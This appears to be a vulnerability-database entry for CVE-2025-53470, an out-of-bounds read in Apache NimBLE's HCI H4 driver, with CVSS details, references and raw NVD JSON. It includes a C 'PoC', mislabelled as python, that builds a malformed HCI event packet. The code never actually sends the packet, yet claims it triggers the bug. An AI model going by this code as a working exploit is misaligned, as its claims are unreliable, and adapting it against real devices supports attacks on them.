CVE-2025-53470

Description

Out-of-bounds Read vulnerability in Apache NimBLE HCI H4 driver. Specially crafted HCI event could lead to invalid memory read in H4 driver. This issue affects Apache NimBLE: through 1.8. This issue requires a broken or bogus Bluetooth controller and thus severity is considered low. Users are recommended to upgrade to version 1.9, which fixes the issue.

CVSS Details

CVSS Score

3.1

Severity

LOW

CVSS Vector

CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:apache:nimble:*:*:*:*:*:*:*:* - VULNERABLE

Apache NimBLE < 1.8.0

Apache NimBLE 1.8.0

Apache NimBLE 1.8.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// PoC for CVE-2025-53470: Apache NimBLE H4 Out-of-bounds Read
// This PoC demonstrates sending a malformed HCI event with mismatched parameter length

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

// HCI Event packet header structure
typedef struct {
    uint8_t event_code;      // Event code
    uint8_t param_total_len; // Total parameter length from header
} hci_event_header_t;

// Function to simulate sending malformed HCI event to NimBLE H4 driver
void send_malformed_hci_event(int fd, uint8_t event_code, uint8_t declared_len, uint8_t* actual_data, size_t actual_len) {
    uint8_t packet[256];
    
    // H4 event packet type indicator
    packet[0] = 0x04;  // HCI_EVENT_PKT type
    
    // Event header
    packet[1] = event_code;
    packet[2] = declared_len;  // Declared length differs from actual
    
    // Copy actual data (shorter than declared length)
    if (actual_len > 0 && actual_data != NULL) {
        memcpy(&packet[3], actual_data, actual_len);
    }
    
    // Send packet to H4 driver
    // write(fd, packet, 3 + actual_len);
    printf("[+] Sending malformed HCI event: code=0x%02x, declared_len=%d, actual_len=%zu\n", 
           event_code, declared_len, actual_len);
    printf("[+] This will trigger out-of-bounds read in NimBLE H4 driver\n");
}

int main() {
    printf("=== CVE-2025-53470 PoC ===\n");
    printf("Target: Apache NimBLE < 1.9 HCI H4 Driver\n");
    printf("Vulnerability: Out-of-bounds Read via malformed HCI event\n\n");
    
    // Example 1: Event with declared length > actual data
    uint8_t event_data[] = {0x01, 0x02};  // Only 2 bytes of actual data
    send_malformed_hci_event(0, 0xFF, 20, event_data, sizeof(event_data));  // Declare 20 bytes
    
    // The H4 driver will attempt to read 20 bytes starting from packet[3],
    // but only 2 bytes are available, causing OOB read
    
    printf("\n[+] Attack vector: Malicious Bluetooth controller sends HCI event\n");
    printf("[+] Result: Driver reads %d bytes beyond allocated buffer\n", 20 - sizeof(event_data));
    printf("[+] Impact: Potential information disclosure or crash\n");
    
    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-53470
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-53470
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-53470/
[4] VulDB https://vuldb.com/cve/CVE-2025-53470
[5] https://github.com/apache/mynewt-nimble/commit/b973df0c6cf7b30efbf8eb2cafdc1ee843464b76
[6] https://lists.apache.org/thread/32sm0944dyod4sdql77stgyw9xb2msc0
[7] http://www.openwall.com/lists/oss-security/2026/01/08/2

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-53470", "sourceIdentifier": "[email protected]", "published": "2026-01-10T10:15:50.493", "lastModified": "2026-01-14T17:38:48.897", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Out-of-bounds Read vulnerability in Apache NimBLE HCI H4 driver. Specially crafted HCI event could lead to invalid memory read in H4 driver.\n\nThis issue affects Apache NimBLE: through 1.8. \n\nThis issue requires a broken or bogus Bluetooth controller and thus severity is considered low.\n\nUsers are recommended to upgrade to version 1.9, which fixes the issue."}, {"lang": "es", "value": "Vulnerabilidad de lectura fuera de límites en el controlador HCI H4 de Apache NimBLE. Un evento HCI especialmente diseñado podría conducir a una lectura de memoria no válida en el controlador H4.\n\nEste problema afecta a Apache NimBLE: hasta la versión 1.8.\n\nEste problema requiere un controlador Bluetooth defectuoso o falso y, por lo tanto, la severidad se considera baja.\n\nSe recomienda a los usuarios actualizar a la versión 1.9, que corrige el problema."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 3.1, "baseSeverity": "LOW", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:nimble:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.9.0", "matchCriteriaId": "DC033019-AA62-465E-AD0A-8018D8C89ED3"}]}]}], "references": [{"url": "https://github.com/apache/mynewt-nimble/commit/b973df0c6cf7b30efbf8eb2cafdc1ee843464b76", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://lists.apache.org/thread/32sm0944dyod4sdql77stgyw9xb2msc0", "source": "[email protected]", "tags": ["Mailing List", "Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/01/08/2", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}]}}